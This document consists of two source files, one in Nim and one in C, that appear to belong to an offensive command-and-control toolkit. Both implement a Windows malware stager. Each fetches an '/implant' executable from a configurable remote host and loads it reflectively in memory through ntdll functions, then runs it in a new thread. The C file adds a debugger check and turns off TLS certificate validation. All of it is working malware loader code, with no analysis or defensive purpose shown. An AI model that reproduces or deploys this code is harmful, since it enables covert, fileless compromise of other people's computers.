File: stager/stager.nim
# Nim stager - Downloads and executes PE in memory using ntdll syscalls
{.passL: "-lwinhttp".}
{.passL: "-lkernel32".}
{.passL: "-mwindows".}

import winim/lean
import winim/inc/winhttp

const
  STAGER_HOST = "HOST_PLACEHOLDER"
  STAGER_PORT = PORT_PLACEHOLDER

type
  NTSTATUS = LONG

  NtAllocateVirtualMemoryProc = proc(
    ProcessHandle: HANDLE,
    BaseAddress: ptr PVOID,
    ZeroBits: ULONG_PTR,
    RegionSize: ptr SIZE_T,
    AllocationType: ULONG,
    Protect: ULONG
  ): NTSTATUS {.stdcall.}

  NtProtectVirtualMemoryProc = proc(
    ProcessHandle: HANDLE,
    BaseAddress: ptr PVOID,
    RegionSize: ptr SIZE_T,
    NewProtect: ULONG,
    OldProtect: ptr ULONG
  ): NTSTATUS {.stdcall.}

  NtCreateThreadExProc = proc(
    ThreadHandle: ptr HANDLE,
    DesiredAccess: ACCESS_MASK,
    ObjectAttributes: PVOID,
    ProcessHandle: HANDLE,
    StartRoutine: PVOID,
    Argument: PVOID,
    CreateFlags: ULONG,
    ZeroBits: SIZE_T,
    StackSize: SIZE_T,
    MaximumStackSize: SIZE_T,
    AttributeList: PVOID
  ): NTSTATUS {.stdcall.}

  NtWaitForSingleObjectProc = proc(
    Handle: HANDLE,
    Alertable: BOOLEAN,
    Timeout: ptr LARGE_INTEGER
  ): NTSTATUS {.stdcall.}

var
  fnNtAllocateVirtualMemory: NtAllocateVirtualMemoryProc
  fnNtProtectVirtualMemory: NtProtectVirtualMemoryProc
  fnNtCreateThreadEx: NtCreateThreadExProc
  fnNtWaitForSingleObject: NtWaitForSingleObjectProc

proc ntSuccess(status: NTSTATUS): bool {.inline.} =
  status >= 0

proc resolveFuncs(): bool =
  let ntdll = GetModuleHandleA("ntdll.dll")
  if ntdll == 0:
    return false

  fnNtAllocateVirtualMemory = cast[NtAllocateVirtualMemoryProc](GetProcAddress(ntdll, "NtAllocateVirtualMemory"))
  fnNtProtectVirtualMemory = cast[NtProtectVirtualMemoryProc](GetProcAddress(ntdll, "NtProtectVirtualMemory"))
  fnNtCreateThreadEx = cast[NtCreateThreadExProc](GetProcAddress(ntdll, "NtCreateThreadEx"))
  fnNtWaitForSingleObject = cast[NtWaitForSingleObjectProc](GetProcAddress(ntdll, "NtWaitForSingleObject"))

  return fnNtAllocateVirtualMemory != nil and fnNtProtectVirtualMemory != nil and
         fnNtCreateThreadEx != nil and fnNtWaitForSingleObject != nil

proc download(host: LPCWSTR, port: INTERNET_PORT, path: LPCWSTR): tuple[buf: ptr byte, size: DWORD] =
  result = (nil, 0.DWORD)

  let hSession = WinHttpOpen(nil, WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, nil, nil, 0)
  if hSession == nil:
    return
  defer: discard WinHttpCloseHandle(hSession)

  let hConnect = WinHttpConnect(hSession, host, port, 0)
  if hConnect == nil:
    return
  defer: discard WinHttpCloseHandle(hConnect)

  let hRequest = WinHttpOpenRequest(hConnect, "GET", path, nil, WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, 0)
  if hRequest == nil:
    return
  defer: discard WinHttpCloseHandle(hRequest)

  if WinHttpSendRequest(hRequest, WINHTTP_NO_ADDITIONAL_HEADERS, 0, nil, 0, 0, 0) == 0:
    return
  if WinHttpReceiveResponse(hRequest, nil) == 0:
    return

  var cap: SIZE_T = 0x100000
  var baseAddr: PVOID = nil

  if not ntSuccess(fnNtAllocateVirtualMemory(cast[HANDLE](-1), addr baseAddr, 0, addr cap, MEM_COMMIT or MEM_RESERVE, PAGE_READWRITE)):
    return

  var buf = cast[ptr byte](baseAddr)
  var total: SIZE_T = 0

  while true:
    var bytesRead: DWORD = 0
    if WinHttpReadData(hRequest, cast[LPVOID](cast[SIZE_T](buf) + total), DWORD(cap - total), addr bytesRead) == 0:
      break
    if bytesRead == 0:
      break
    total += SIZE_T(bytesRead)

    if total >= cap - 0x10000:
      var newSize: SIZE_T = cap * 2
      var newBuf: PVOID = nil
      if not ntSuccess(fnNtAllocateVirtualMemory(cast[HANDLE](-1), addr newBuf, 0, addr newSize, MEM_COMMIT or MEM_RESERVE, PAGE_READWRITE)):
        return
      copyMem(newBuf, buf, total)
      buf = cast[ptr byte](newBuf)
      cap = newSize

  if total > 0:
    result = (buf, DWORD(total))

proc mapPE(raw: ptr byte, rawSize: DWORD): PVOID =
  let rawAddr = cast[SIZE_T](raw)
  
  let dos = cast[ptr IMAGE_DOS_HEADER](raw)
  if dos.e_magic != IMAGE_DOS_SIGNATURE:
    return nil

  let nt = cast[ptr IMAGE_NT_HEADERS](rawAddr + SIZE_T(dos.e_lfanew))
  if nt.Signature != IMAGE_NT_SIGNATURE:
    return nil

  var imageSize: SIZE_T = SIZE_T(nt.OptionalHeader.SizeOfImage)
  var baseAddr: PVOID = nil

  if not ntSuccess(fnNtAllocateVirtualMemory(cast[HANDLE](-1), addr baseAddr, 0, addr imageSize, MEM_COMMIT or MEM_RESERVE, PAGE_READWRITE)):
    return nil

  let mapped = cast[ptr byte](baseAddr)
  let mappedAddr = cast[SIZE_T](mapped)

  copyMem(mapped, raw, nt.OptionalHeader.SizeOfHeaders)

  let secBase = cast[SIZE_T](nt) + SIZE_T(sizeof(IMAGE_NT_HEADERS))
  for i in 0..<int(nt.FileHeader.NumberOfSections):
    let sec = cast[ptr IMAGE_SECTION_HEADER](secBase + SIZE_T(i * sizeof(IMAGE_SECTION_HEADER)))
    if sec.SizeOfRawData > 0:
      copyMem(
        cast[pointer](mappedAddr + SIZE_T(sec.VirtualAddress)),
        cast[pointer](rawAddr + SIZE_T(sec.PointerToRawData)),
        sec.SizeOfRawData
      )

  let delta = cast[int64](mapped) - cast[int64](nt.OptionalHeader.ImageBase)
  if delta != 0 and nt.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size > 0:
    var reloc = cast[ptr IMAGE_BASE_RELOCATION](mappedAddr + SIZE_T(nt.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress))
    while reloc.VirtualAddress != 0:
      let count = (reloc.SizeOfBlock - DWORD(sizeof(IMAGE_BASE_RELOCATION))) div 2
      let entries = cast[ptr UncheckedArray[WORD]](cast[SIZE_T](reloc) + SIZE_T(sizeof(IMAGE_BASE_RELOCATION)))
      for j in 0..<int(count):
        let entry = entries[j]
        let relType = entry shr 12
        let offset = entry and 0xFFF
        if relType == IMAGE_REL_BASED_DIR64:
          let patch = cast[ptr uint64](mappedAddr + SIZE_T(reloc.VirtualAddress) + SIZE_T(offset))
          patch[] = cast[uint64](cast[int64](patch[]) + delta)
        elif relType == IMAGE_REL_BASED_HIGHLOW:
          let patch = cast[ptr uint32](mappedAddr + SIZE_T(reloc.VirtualAddress) + SIZE_T(offset))
          patch[] = cast[uint32](cast[int64](patch[]) + delta)
      reloc = cast[ptr IMAGE_BASE_RELOCATION](cast[SIZE_T](reloc) + SIZE_T(reloc.SizeOfBlock))

  if nt.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size > 0:
    var imp = cast[ptr IMAGE_IMPORT_DESCRIPTOR](mappedAddr + SIZE_T(nt.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress))
    while imp.Name != 0:
      let modName = cast[LPCSTR](mappedAddr + SIZE_T(imp.Name))
      let module = LoadLibraryA(modName)
      if module != 0:
        var thunk = cast[ptr uint64](mappedAddr + SIZE_T(imp.FirstThunk))
        var origThunk = if imp.union1.OriginalFirstThunk != 0:
          cast[ptr uint64](mappedAddr + SIZE_T(imp.union1.OriginalFirstThunk))
        else:
          thunk
        while origThunk[] != 0:
          if (origThunk[] and uint64(IMAGE_ORDINAL_FLAG64)) != 0:
            thunk[] = cast[uint64](GetProcAddress(module, cast[LPCSTR](origThunk[] and 0xFFFF)))
          else:
            let name = cast[ptr IMAGE_IMPORT_BY_NAME](mappedAddr + SIZE_T(origThunk[]))
            thunk[] = cast[uint64](GetProcAddress(module, cast[LPCSTR](addr name.Name)))
          thunk = cast[ptr uint64](cast[SIZE_T](thunk) + 8)
          origThunk = cast[ptr uint64](cast[SIZE_T](origThunk) + 8)
      imp = cast[ptr IMAGE_IMPORT_DESCRIPTOR](cast[SIZE_T](imp) + SIZE_T(sizeof(IMAGE_IMPORT_DESCRIPTOR)))

  for i in 0..<int(nt.FileHeader.NumberOfSections):
    let sec = cast[ptr IMAGE_SECTION_HEADER](secBase + SIZE_T(i * sizeof(IMAGE_SECTION_HEADER)))
    var prot: ULONG = PAGE_READONLY
    let chr = sec.Characteristics
    if (chr and IMAGE_SCN_MEM_EXECUTE) != 0:
      prot = if (chr and IMAGE_SCN_MEM_WRITE) != 0: PAGE_EXECUTE_READWRITE else: PAGE_EXECUTE_READ
    elif (chr and IMAGE_SCN_MEM_WRITE) != 0:
      prot = PAGE_READWRITE

    var secAddr: PVOID = cast[PVOID](mappedAddr + SIZE_T(sec.VirtualAddress))
    var secSize: SIZE_T = if sec.Misc.VirtualSize == 0: SIZE_T(sec.SizeOfRawData) else: SIZE_T(sec.Misc.VirtualSize)
    var oldProt: ULONG = 0
    discard fnNtProtectVirtualMemory(cast[HANDLE](-1), addr secAddr, addr secSize, prot, addr oldProt)

  return cast[PVOID](mappedAddr + SIZE_T(nt.OptionalHeader.AddressOfEntryPoint))

proc main(): int32 =
  if not resolveFuncs():
    return 1

  let hostW = newWideCString(STAGER_HOST)
  let pathW = newWideCString("/implant")

  let (buf, size) = download(cast[LPCWSTR](&hostW[0]), STAGER_PORT.INTERNET_PORT, cast[LPCWSTR](&pathW[0]))
  if buf == nil or size < 0x100:
    return 1

  let entry = mapPE(buf, size)
  if entry == nil:
    return 1

  var hThread: HANDLE = 0
  if not ntSuccess(fnNtCreateThreadEx(addr hThread, THREAD_ALL_ACCESS, nil, cast[HANDLE](-1), entry, nil, 0, 0, 0, 0, nil)):
    return 1

  discard fnNtWaitForSingleObject(hThread, 0, nil)
  return 0

when isMainModule:
  quit(main())

File: stager/stager.c
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <winhttp.h>

#pragma comment(lib, "winhttp.lib")

typedef LONG NTSTATUS;
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)



typedef NTSTATUS(NTAPI *pNtAllocateVirtualMemory)(
    HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits,
    PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);

typedef NTSTATUS(NTAPI *pNtProtectVirtualMemory)(HANDLE ProcessHandle,
                                                 PVOID *BaseAddress,
                                                 PSIZE_T RegionSize,
                                                 ULONG NewProtect,
                                                 PULONG OldProtect);

typedef NTSTATUS(NTAPI *pNtCreateThreadEx)(
    PHANDLE ThreadHandle, ACCESS_MASK DesiredAccess, PVOID ObjectAttributes,
    HANDLE ProcessHandle, PVOID StartRoutine, PVOID Argument, ULONG CreateFlags,
    SIZE_T ZeroBits, SIZE_T StackSize, SIZE_T MaximumStackSize,
    PVOID AttributeList);

typedef NTSTATUS(NTAPI *pNtWaitForSingleObject)(HANDLE Handle,
                                                BOOLEAN Alertable,
                                                PLARGE_INTEGER Timeout);

static pNtAllocateVirtualMemory fnNtAllocateVirtualMemory;
static pNtProtectVirtualMemory fnNtProtectVirtualMemory;
static pNtCreateThreadEx fnNtCreateThreadEx;
static pNtWaitForSingleObject fnNtWaitForSingleObject;

static BOOL ResolveFuncs(void) {
  HMODULE ntdll = GetModuleHandleA("ntdll.dll");
  if (!ntdll)
    return FALSE;

  fnNtAllocateVirtualMemory = (pNtAllocateVirtualMemory)GetProcAddress(
      ntdll, "NtAllocateVirtualMemory");
  fnNtProtectVirtualMemory =
      (pNtProtectVirtualMemory)GetProcAddress(ntdll, "NtProtectVirtualMemory");
  fnNtCreateThreadEx =
      (pNtCreateThreadEx)GetProcAddress(ntdll, "NtCreateThreadEx");
  fnNtWaitForSingleObject =
      (pNtWaitForSingleObject)GetProcAddress(ntdll, "NtWaitForSingleObject");

  return fnNtAllocateVirtualMemory && fnNtProtectVirtualMemory &&
         fnNtCreateThreadEx && fnNtWaitForSingleObject;
}

static PBYTE Download(LPCWSTR host, USHORT port, LPCWSTR path, PDWORD outSize) {
  HINTERNET hSession = NULL, hConnect = NULL, hRequest = NULL;
  PBYTE buf = NULL;
  DWORD total = 0, cap = 0x100000;

  hSession =
      WinHttpOpen(NULL, WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, NULL, NULL, 0);
  if (!hSession)
    goto cleanup;

  hConnect = WinHttpConnect(hSession, host, port, 0);
  if (!hConnect)
    goto cleanup;

#ifdef USE_TLS
  DWORD flags = WINHTTP_FLAG_SECURE;
#else
  DWORD flags = 0;
#endif

  hRequest =
      WinHttpOpenRequest(hConnect, L"GET", path, NULL, WINHTTP_NO_REFERER,
                         WINHTTP_DEFAULT_ACCEPT_TYPES, flags);
  if (!hRequest)
    goto cleanup;

#ifdef USE_TLS
  // Ignore certificate validation errors for self-signed certs
  // WINHTTP_OPTION_SECURITY_FLAGS = 31
  // SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_CN_INVALID |
  // SECURITY_FLAG_IGNORE_CERT_DATE_INVALID = 0x3100
  DWORD secFlags = 0x00003300;
  WinHttpSetOption(hRequest, 31, &secFlags, sizeof(secFlags));
#endif

  if (!WinHttpAddRequestHeaders(hRequest, L"X-Download-Key: DOWNLOAD_KEY_PLACEHOLDER\r\n", -1, WINHTTP_ADDREQ_FLAG_ADD))
    goto cleanup;

  if (!WinHttpSendRequest(hRequest, WINHTTP_NO_ADDITIONAL_HEADERS, 0,
                          WINHTTP_NO_REQUEST_DATA, 0, 0, 0))
    goto cleanup;
  if (!WinHttpReceiveResponse(hRequest, NULL))
    goto cleanup;

  SIZE_T regionSize = cap;
  PVOID baseAddr = NULL;
  if (!NT_SUCCESS(
          fnNtAllocateVirtualMemory((HANDLE)-1, &baseAddr, 0, &regionSize,
                                    MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE)))
    goto cleanup;
  buf = (PBYTE)baseAddr;

  DWORD bytesRead;
  while (WinHttpReadData(hRequest, buf + total, cap - total, &bytesRead) &&
         bytesRead > 0) {
    total += bytesRead;
    if (total >= cap - 0x10000) {
      SIZE_T newSize = cap * 2;
      PVOID newBuf = NULL;
      if (!NT_SUCCESS(fnNtAllocateVirtualMemory(
              (HANDLE)-1, &newBuf, 0, &newSize, MEM_COMMIT | MEM_RESERVE,
              PAGE_READWRITE)))
        goto cleanup;
      CopyMemory(newBuf, buf, total);
      buf = (PBYTE)newBuf;
      cap = (DWORD)newSize;
    }
  }

  *outSize = total;

cleanup:
  if (hRequest)
    WinHttpCloseHandle(hRequest);
  if (hConnect)
    WinHttpCloseHandle(hConnect);
  if (hSession)
    WinHttpCloseHandle(hSession);
  return total > 0 ? buf : NULL;
}

static BOOL MapPE(PBYTE raw, DWORD rawSize, PVOID *outEntry) {
  PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)raw;
  if (dos->e_magic != IMAGE_DOS_SIGNATURE)
    return FALSE;

  PIMAGE_NT_HEADERS nt = (PIMAGE_NT_HEADERS)(raw + dos->e_lfanew);
  if (nt->Signature != IMAGE_NT_SIGNATURE)
    return FALSE;

  SIZE_T imageSize = nt->OptionalHeader.SizeOfImage;
  PVOID baseAddr = NULL;

  if (!NT_SUCCESS(
          fnNtAllocateVirtualMemory((HANDLE)-1, &baseAddr, 0, &imageSize,
                                    MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE)))
    return FALSE;

  PBYTE mapped = (PBYTE)baseAddr;
  CopyMemory(mapped, raw, nt->OptionalHeader.SizeOfHeaders);

  PIMAGE_SECTION_HEADER sec = IMAGE_FIRST_SECTION(nt);
  for (WORD i = 0; i < nt->FileHeader.NumberOfSections; i++) {
    if (sec[i].SizeOfRawData > 0) {
      CopyMemory(mapped + sec[i].VirtualAddress, raw + sec[i].PointerToRawData,
                 sec[i].SizeOfRawData);
    }
  }

  LONGLONG delta = (LONGLONG)mapped - (LONGLONG)nt->OptionalHeader.ImageBase;
  if (delta != 0 &&
      nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size >
          0) {
    PIMAGE_BASE_RELOCATION reloc =
        (PIMAGE_BASE_RELOCATION)(mapped +
                                 nt->OptionalHeader
                                     .DataDirectory
                                         [IMAGE_DIRECTORY_ENTRY_BASERELOC]
                                     .VirtualAddress);
    while (reloc->VirtualAddress) {
      DWORD count =
          (reloc->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(WORD);
      PWORD entries = (PWORD)((PBYTE)reloc + sizeof(IMAGE_BASE_RELOCATION));
      for (DWORD j = 0; j < count; j++) {
        WORD type = entries[j] >> 12;
        WORD offset = entries[j] & 0xFFF;
        if (type == IMAGE_REL_BASED_DIR64) {
          PULONGLONG patch =
              (PULONGLONG)(mapped + reloc->VirtualAddress + offset);
          *patch += delta;
        } else if (type == IMAGE_REL_BASED_HIGHLOW) {
          PULONG patch = (PULONG)(mapped + reloc->VirtualAddress + offset);
          *patch += (ULONG)delta;
        }
      }
      reloc = (PIMAGE_BASE_RELOCATION)((PBYTE)reloc + reloc->SizeOfBlock);
    }
  }

  if (nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size > 0) {
    PIMAGE_IMPORT_DESCRIPTOR imp =
        (PIMAGE_IMPORT_DESCRIPTOR)(mapped +
                                   nt->OptionalHeader
                                       .DataDirectory
                                           [IMAGE_DIRECTORY_ENTRY_IMPORT]
                                       .VirtualAddress);
    while (imp->Name) {
      HMODULE mod = LoadLibraryA((LPCSTR)(mapped + imp->Name));
      if (mod) {
        PULONGLONG thunk = (PULONGLONG)(mapped + imp->FirstThunk);
        PULONGLONG origThunk =
            imp->OriginalFirstThunk
                ? (PULONGLONG)(mapped + imp->OriginalFirstThunk)
                : thunk;
        while (*origThunk) {
          if (*origThunk & IMAGE_ORDINAL_FLAG64) {
            *thunk =
                (ULONGLONG)GetProcAddress(mod, (LPCSTR)(*origThunk & 0xFFFF));
          } else {
            PIMAGE_IMPORT_BY_NAME name =
                (PIMAGE_IMPORT_BY_NAME)(mapped + *origThunk);
            *thunk = (ULONGLONG)GetProcAddress(mod, name->Name);
          }
          thunk++;
          origThunk++;
        }
      }
      imp++;
    }
  }

  for (WORD i = 0; i < nt->FileHeader.NumberOfSections; i++) {
    DWORD prot = PAGE_READONLY;
    DWORD chr = sec[i].Characteristics;
    if (chr & IMAGE_SCN_MEM_EXECUTE) {
      prot = (chr & IMAGE_SCN_MEM_WRITE) ? PAGE_EXECUTE_READWRITE
                                         : PAGE_EXECUTE_READ;
    } else if (chr & IMAGE_SCN_MEM_WRITE) {
      prot = PAGE_READWRITE;
    }

    PVOID secBase = mapped + sec[i].VirtualAddress;
    SIZE_T secSize = sec[i].Misc.VirtualSize;
    if (secSize == 0)
      secSize = sec[i].SizeOfRawData;
    ULONG oldProt;
    fnNtProtectVirtualMemory((HANDLE)-1, &secBase, &secSize, prot, &oldProt);
  }

  *outEntry = mapped + nt->OptionalHeader.AddressOfEntryPoint;
  return TRUE;
}

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
                   LPSTR lpCmdLine, int nCmdShow) {
  if (IsDebuggerPresent())
    return 0;

  if (!ResolveFuncs())
    return 1;

  DWORD size = 0;
  PBYTE pe =
      Download(L"HOST_PLACEHOLDER", PORT_PLACEHOLDER, L"/implant", &size);
  if (!pe || size < 0x100)
    return 1;

  PVOID entry = NULL;
  if (!MapPE(pe, size, &entry))
    return 1;

  HANDLE hThread = NULL;
  if (!NT_SUCCESS(fnNtCreateThreadEx(&hThread, THREAD_ALL_ACCESS, NULL,
                                     (HANDLE)-1, entry, NULL, 0, 0, 0, 0,
                                     NULL)))
    return 1;

  fnNtWaitForSingleObject(hThread, FALSE, NULL);
  return 0;
}
